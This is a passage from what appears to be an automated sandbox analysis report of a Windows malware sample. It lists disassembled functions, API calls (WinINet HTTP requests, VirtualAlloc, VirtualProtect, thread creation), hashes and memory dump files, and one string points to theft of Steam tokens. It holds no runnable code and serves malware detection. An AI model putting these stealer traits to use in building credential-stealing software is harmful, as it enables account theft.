                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3183270410-0
                                                                                                                                                                                      • Opcode ID: 6ac38f89bcff680bee3ae97d90d7b0d70599e6a4c5c430a4cb33d37605150589
                                                                                                                                                                                      • Instruction ID: 9ca02f23ebad7ae2b560a7066a31919a0b1b3cda9bc1c2ab43e918fe81a2141e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ac38f89bcff680bee3ae97d90d7b0d70599e6a4c5c430a4cb33d37605150589
                                                                                                                                                                                      • Instruction Fuzzy Hash: 75E06575500228BBDB11AB90DC45FDE3768AB45754F004051FB199A1D0D6B0EA858B94
                                                                                                                                                                                      Function 61E33F01 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                      • String ID: winRead
                                                                                                                                                                                      • API String ID: 2738559852-2759563040
                                                                                                                                                                                      • Opcode ID: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
                                                                                                                                                                                      • Instruction ID: 0463a8294cdaeeb391ba6f45b5ad466d8cdf6662135ec028d0205bc88dba3c8e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2041E475A052699BCF04CFA8D88498EBBF2FF88314F618529E868A7354D730E941CB91
                                                                                                                                                                                      Function 00346580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,00000000,?,?,003466AF), ref: 003465FF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 544645111-3916222277
                                                                                                                                                                                      • Opcode ID: f96d5b8b654dcac285299f74dbbb5d21e086e5de928c881c3396ff82a807e84c
                                                                                                                                                                                      • Instruction ID: 295bc0c855158f337e6b156ce38467bd8c32dd0288616e9884aead2db2a7f0d3
                                                                                                                                                                                      • Opcode Fuzzy Hash: f96d5b8b654dcac285299f74dbbb5d21e086e5de928c881c3396ff82a807e84c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5111BCB1100609EAEF22CF94CA867E8B7E8FB06340F214499E542DA284C734FE45DB56
                                                                                                                                                                                      Function 00351471 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 0034502A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0034507A
                                                                                                                                                                                        • Part of subcall function 0034502A: StrCmpCA.SHLWAPI(?), ref: 0034508E
                                                                                                                                                                                        • Part of subcall function 0034502A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003450B1
                                                                                                                                                                                        • Part of subcall function 0034502A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 003450E7
                                                                                                                                                                                        • Part of subcall function 0034502A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0034510B
                                                                                                                                                                                        • Part of subcall function 0034502A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00345116
                                                                                                                                                                                        • Part of subcall function 0034502A: HttpQueryInfoA.WININET(00000000,00000013,?,00000000), ref: 00345134
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,ERROR,00351FD9), ref: 003514B2
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                      • String ID: ERROR
                                                                                                                                                                                      • API String ID: 3086566538-2861137601
                                                                                                                                                                                      • Opcode ID: 22d66874afdf391594fdd7cc9a122f689ad0735f406a6264e65720e38929d370
                                                                                                                                                                                      • Instruction ID: b5d1912c23596e362f4b76cc2182a8202725d6ecac8849d6e8698ae1d29917b8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 22d66874afdf391594fdd7cc9a122f689ad0735f406a6264e65720e38929d370
                                                                                                                                                                                      • Instruction Fuzzy Hash: 65011775900108ABCB16FFB5D8969DD37A8BE01354F408164F9169F192FF30FA08C691
                                                                                                                                                                                      Function 61E354D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,61ECC400,?,61E35248), ref: 61E354EB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InfoSystem
                                                                                                                                                                                      • String ID: HRa
                                                                                                                                                                                      • API String ID: 31276548-1004199025
                                                                                                                                                                                      • Opcode ID: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
                                                                                                                                                                                      • Instruction ID: 06cda1940385b8855eb11c4b22b944da250b3e82bd825487f891a332eec36e05
                                                                                                                                                                                      • Opcode Fuzzy Hash: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 56F03AB02083419BD704AFA4C60631FBAF5AFC6B09F66C82DD1858B380CB75D8559B93
                                                                                                                                                                                      Function 0034FDB5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SHFileOperationA.SHELL32(?), ref: 0034FDEB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileOperation
                                                                                                                                                                                      • String ID: f5
                                                                                                                                                                                      • API String ID: 3080627654-2543225189
                                                                                                                                                                                      • Opcode ID: c1867e088241fed4b314ca05164727c504e8ab4005a0d5dd68e3481bf4dd661e
                                                                                                                                                                                      • Instruction ID: ad76ec83c362ee293fdf4d452ba6ad6e1dd815dcc770e42d9a98b51c7240d48d
                                                                                                                                                                                      • Opcode Fuzzy Hash: c1867e088241fed4b314ca05164727c504e8ab4005a0d5dd68e3481bf4dd661e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 94E048B4E0820D9BCB49DFA8E44569EBAB8AF08304F00856AE419E7350E77497458BA9
                                                                                                                                                                                      Function 003527F0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,0035E266), ref: 0035282F
                                                                                                                                                                                        • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
                                                                                                                                                                                        • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
                                                                                                                                                                                        • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Soft\Steam\steam_tokens.txt, xrefs: 00352844
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$CreateObjectOpenSingleThreadWaitlstrcat
                                                                                                                                                                                      • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                      • API String ID: 2202680014-3507145866
                                                                                                                                                                                      • Opcode ID: e8f3eba9e6150ee570dd85195f851541c32f98eeb23d73c24fd458b60bb7bb96
                                                                                                                                                                                      • Instruction ID: 528d9291f58f404539b14034b9ba7762718e2ad1da0060c13f3e35655bae1ebb
                                                                                                                                                                                      • Opcode Fuzzy Hash: e8f3eba9e6150ee570dd85195f851541c32f98eeb23d73c24fd458b60bb7bb96
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5401C871D00108AACB06FBB4DC97CEE7BB8AE11344F8046A5F5126E092EF20BB49C695
                                                                                                                                                                                      Function 0034F884 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,0035158E,ERROR,00361C14,?,0035158D,00000000,00000000), ref: 0034F89D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocLocal
                                                                                                                                                                                      • String ID: ERROR
                                                                                                                                                                                      • API String ID: 3494564517-2861137601
                                                                                                                                                                                      • Opcode ID: 5ab1d44ac03bb765918bdc194174d6406a0f2fc3063add2eb028f2ec321397ac
                                                                                                                                                                                      • Instruction ID: 38774e3a19eb33d040b60fa75e4a5bac3940cf617a05af1bfc0bcdbe6304653b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ab1d44ac03bb765918bdc194174d6406a0f2fc3063add2eb028f2ec321397ac
                                                                                                                                                                                      • Instruction Fuzzy Hash: A8F0E5376016146FE7234D59880056A77DA9BC5B6070E813AFE689F318C631EC4186E0
                                                                                                                                                                                      Function 0034626A Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,00000000,?,?,0034666C,?,00361ECC), ref: 003462C9
                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,00000000,?,?,0034666C,?,00361ECC), ref: 003462F5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                      • Opcode ID: e4e1d737b153b7c434c3504c46128a78423b96d0bcee1badbed95d2103a667da
                                                                                                                                                                                      • Instruction ID: 21a40538838f6912dfec154aa77aa8388abccbdb71b4a86cb4d35cfd5e199f75
                                                                                                                                                                                      • Opcode Fuzzy Hash: e4e1d737b153b7c434c3504c46128a78423b96d0bcee1badbed95d2103a667da
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3921A271700705ABCB25CFB4CC86BAAB7E5EF85314F24482DE65ACA290D2B5AD40CB04
                                                                                                                                                                                      Function 00346620 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
